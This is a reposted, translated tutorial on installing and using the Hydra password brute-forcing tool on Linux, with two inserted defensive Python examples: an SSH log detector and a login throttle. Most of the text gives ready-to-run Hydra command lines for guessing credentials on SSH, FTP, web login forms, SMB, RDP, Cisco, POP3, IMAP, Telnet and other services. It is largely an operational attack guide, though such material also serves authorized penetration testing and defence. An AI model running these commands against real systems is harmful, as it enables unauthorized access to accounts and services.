A Detailed Guide to Hydra, a Brute-Force Cracking Tool on Linux
I. Introduction
Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add; besides that, it is flexible and very fast.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.
Currently this tool supports:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.
This tool is proof-of-concept code, intended to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
The program is maintained by van Hauser and David Maciejak.
The Hackers Choice
http://www.thc.org/thc-hydra
II. Installation
1. Install the dependency packages
- Ubuntu/Debian
- apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra
Debian and Ubuntu ship hydra in their package repositories, so it can be installed online directly with apt-get.
- Redhat/Fedora
- yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
- OpenSuSE
- zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
This experiment uses CentOS release 5.6 (Final). After running yum install, the dependency packages were installed as follows (screenshot not preserved):
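2. Install Hydra
# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
# tar zxvf hydra-7.4.1.tar.gz
# cd hydra-7.4.1
# ./configure
# make && make install
./configure checks the configuration of some components on the current system, mainly to detect which cracking modules can be supported; install the corresponding support libraries and dependency packages as needed.
# make
# make install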
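III. Syntax
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R
Resume cracking from where the previous run left off
-S
Uppercase; use an SSL connection
-s <PORT>
Lowercase; specifies a non-default port
-l <LOGIN>
Specifies the user to crack; targets one particular user
-L <FILE>
Specifies a username dictionary
-p <PASS>
Lowercase; specifies a single password to try; rarely used, since a password dictionary is normally used instead
-P <FILE>
Uppercase; specifies a password dictionary
-e <ns>
Optional; n: try an empty password, s: try the specified user name as the password
-C <FILE>
Use a colon-separated format, for example "login:password", instead of the -L/-P options
-M <FILE>
Specifies a file listing the targets, one per line
-o <FILE>
Specifies the output file for results
-f
When the -M option is used, stop cracking as soon as the first login/password pair is found
-t <TASKS>
Number of threads run in parallel; the default is 16
-w <TIME>
Sets the maximum timeout in seconds; the default is 30s
-v / -V
Show verbose output
server
Target IP
service
Specifies the service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp and so on
OPT
Optional arguments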
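IV. Examples
1. Manually create a username dictionary and a password dictionary. This is only a demonstration, so just a few usernames and weak passwords were added. For real cracking, a password dictionary generator is needed to produce a strong dictionary.
2. Crack ssh: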
# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh
When cracking succeeds, the result is displayed directly.
The -o option can also be used to specify a results output file.
# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
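Seen from the target host, a run like the one above shows up in the sshd log as a series of failed password events from one source address spread over several account names. The following is an added example, not part of the original post: it flags such sources in OpenSSH-style syslog lines. The log lines are constructed, and the thresholds and the assumed year are illustrative choices; a wide window is used because `-t 1` keeps the guess rate low.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH syslog format (not real log data).
SAMPLE_LOG = """\
Jan 10 10:00:01 host sshd[2101]: Failed password for root from 192.168.1.50 port 40001 ssh2
Jan 10 10:00:03 host sshd[2102]: Failed password for root from 192.168.1.50 port 40002 ssh2
Jan 10 10:00:05 host sshd[2103]: Failed password for invalid user admin from 192.168.1.50 port 40003 ssh2
Jan 10 10:00:07 host sshd[2104]: Failed password for invalid user admin from 192.168.1.50 port 40004 ssh2
Jan 10 10:00:09 host sshd[2105]: Failed password for invalid user test from 192.168.1.50 port 40005 ssh2
Jan 10 10:00:11 host sshd[2106]: Failed password for invalid user test from 192.168.1.50 port 40006 ssh2
Jan 10 10:02:00 host sshd[2110]: Failed password for alice from 192.168.1.77 port 51000 ssh2
Jan 10 10:02:10 host sshd[2111]: Accepted password for alice from 192.168.1.77 port 51001 ssh2
"""

FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def parse_failures(text, year=2024):
    """Yield (timestamp, user, source) per failed-password line (year is assumed)."""
    for line in text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            yield ts, m.group(2), m.group(3)

def detect_bruteforce(text, window=timedelta(minutes=5), min_failures=5, min_users=2):
    """Return {source: (total_failures, distinct_users)} for every source that
    reaches both thresholds inside some sliding window."""
    by_src = defaultdict(list)
    for ts, user, src in parse_failures(text):
        by_src[src].append((ts, user))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:
                start += 1  # drop events that fell out of the window
            in_window = events[start:end + 1]
            if (len(in_window) >= min_failures
                    and len({u for _, u in in_window}) >= min_users):
                flagged[src] = (len(events), len({u for _, u in events}))
                break
    return flagged
```

A single mistyped password followed by a successful login, as for the second source in the sample, stays below both thresholds and is not reported.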
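V. Cracking other types of passwords
- Crack ftp:
- # hydra ip ftp -l username -P password_dictionary -t threads (default 16) -vV
- # hydra ip ftp -l username -P password_dictionary -e ns -vV
- Crack a web login submitted via GET:
- # hydra -l username -P password_dictionary -t threads -vV -e ns ip http-get /admin/
- # hydra -l username -P password_dictionary -t threads -vV -e ns -f ip http-get /admin/index.php
- Crack a web login submitted via POST:
The strength of this software is that it supports cracking many protocols, including logins on web user interfaces. Forms submitted via GET are relatively simple, so the POST case is used here to show the approach. One drawback of the tool is that it cannot crack a login when the target site requires a CAPTCHA. Cracking with parameters works as follows: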
- <form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>
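Suppose there is a password login form like the one above. We run the command:
- # hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form "index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>"
Explanation: the username being cracked is admin, the password dictionary is pass.lst, the results are saved in ok.lst, -t sets the number of parallel threads to 1, -f stops as soon as one password has been cracked, the IP is the local machine (the target IP), and http-post-form means the target is a form password submitted via HTTP POST.
The parameters that follow are the name attributes of the corresponding form fields in the web page, and the content inside <title> after them is the message returned for an incorrect guess, which can be customized.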
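Because the tool cannot get past a CAPTCHA, a login handler for a form like the one above can step up to a CAPTCHA once failures accumulate for an account or a source address, which also catches a single-threaded (`-t 1`) run against one account. The following is an added example, not code from the original post; the class, the thresholds and the replayed guesses are assumptions, and the plain string comparison stands in for real password-hash verification.

```python
from collections import defaultdict, deque

class LoginThrottle:
    """Sliding-window failure counter keyed by account name and source address."""

    def __init__(self, window=300, captcha_after=3, block_after=10):
        self.window = window                # seconds of history that count
        self.captcha_after = captcha_after  # failures before a CAPTCHA is required
        self.block_after = block_after      # failures before requests are refused
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures

    def _recent(self, key, now):
        q = self.failures[key]
        while q and now - q[0] > self.window:
            q.popleft()                     # forget failures older than the window
        return len(q)

    def decide(self, name, source_ip, now):
        """Return 'allow', 'captcha' or 'block' before the password is checked."""
        worst = max(self._recent(("user", name), now),
                    self._recent(("ip", source_ip), now))
        if worst >= self.block_after:
            return "block"
        return "captcha" if worst >= self.captcha_after else "allow"

    def record_failure(self, name, source_ip, now):
        self.failures[("user", name)].append(now)
        self.failures[("ip", source_ip)].append(now)

    def record_success(self, name):
        self.failures.pop(("user", name), None)

def replay(throttle, attempts, real_password):
    """Feed (time, name, pwd, ip) tuples through the throttle; return the decisions."""
    decisions = []
    for now, name, pwd, ip in attempts:
        decision = throttle.decide(name, ip, now)
        decisions.append(decision)
        # A scripted client cannot answer the CAPTCHA, so a stepped-up or blocked
        # request is rejected and counted without the password being checked.
        if decision == "allow" and pwd == real_password:
            throttle.record_success(name)
        else:
            throttle.record_failure(name, ip, now)
    return decisions

# Constructed input: 12 guesses for "admin" from one address, 2 seconds apart.
GUESSES = [(2 * i, "admin", f"guess{i}", "192.0.2.10") for i in range(12)]
```

With these thresholds, a correct password that appears in the list after the third failure is still not accepted, because the request is answered with the CAPTCHA step before the password is evaluated.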
- Crack https:
- # hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
- Crack teamspeak:
- # hydra -l username -P password_dictionary -s port -vV ip teamspeak
- Crack cisco:
- # hydra -P pass.txt 10.36.16.18 cisco
- # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
- Crack smb:
- # hydra -l administrator -P pass.txt 10.36.16.18 smb
- Crack pop3:
- # hydra -l muts -P pass.txt my.pop3.mail pop3
- Crack rdp:
- # hydra ip rdp -l administrator -P pass.txt -V
- Crack http-proxy:
- # hydra -l admin -P pass.txt http-proxy://10.36.16.18
- Crack imap:
- # hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
- # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
- Crack telnet:
- # hydra ip telnet -l user -P password_dictionary -t 32 -s 23 -e ns -f -V
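VI. Summary
The tool's capabilities go well beyond the tests above. Whether a password can be cracked depends mainly on having a strong dictionary; in social-engineering-style penetration work, this can sometimes yield twice the result for half the effort.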
Reposted from: https://www.cnblogs.com/liuyansheng/p/6346598.html